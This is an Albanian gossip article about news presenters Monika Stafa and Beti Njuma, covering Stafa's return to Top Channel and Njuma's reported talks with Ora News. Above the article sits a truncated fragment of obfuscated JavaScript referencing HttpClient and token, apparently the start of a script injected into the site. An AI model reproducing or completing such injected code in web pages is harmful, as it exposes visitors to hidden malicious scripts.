;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Një kthehet, tjetra largohet: Rindizet rivaliteti mes spikereve të Top Channel?

By

Pak ditë më parë u bë e ditur që Monika Stafa, prezantuesja ikonë e lajmeve në Top Channel, me të cilën nisi transmetimi i këtij kanali 17 vite më parë, është rikthyer në shtëpinë e vjetër.

Pas  dy vitesh shkëputje, Monika u shfaq sërish në lajmet e televizionit.

Image result for monika stafa

E me ardhjen e Monikës, një tjetër figurë e konsoliduar po mendon largimin.

Raportohet se prezantuesja e njohur, Beti Njuma është në negociata për t’u transferuar në ‘Ora News’. Burime i thanë Prive.al se një zhvillim i tillë rikthen në vëmendje raportin jo të mirë mes Njumës dhe Monika Stafës, tashmë të sapo rikthyer. Dy spikeret ikonë u patën përplasur publikisht në vitin 2012, me kunja në editoriale gazetash e rrjete sociale dhe që nga atëherë kanë një rivalitet në distancë.

Image result for beti njuma

Deri tani, Beti kishte rol kryesor në lajmet e Topit teksa këtë pozitë e fortifikoi gjatë verës me pjesëmarrjen në jurinë e ‘Top Talent’ aty ku shprehu lojalitetin ndaj Top Channel kur tha në njërën prej puntatave që nuk e ka ndërmend të lëvizë.

Por, tashmë, vetëm pak javë pas, gjërat kanë ndryshuar dhe kjo ka bërë që ofertat për kalimin e Njumës në Ora të shqyrtohen.

Ora News, si secili kanal tjetër informativ është në panik nga hapja e filialit të CNN e për rrjedhojë, sidomos pas largimit të Ilva Tarës me çdo kusht po kërkon ikona për edicionet informative. Kush më mirë se Beti mund ta plotësojë një pozitë të tillë?

Burimet thonë që lëvizja drejt Ora News nuk është ende e konfirmuar dhe mund të mos ndodhë fare por pakënaqësitë e Betit, shfaqur befasishëm, janë evidente dhe po përfliten në korridoret e televizionit. /Privea.l

Artikuj të ngjashëm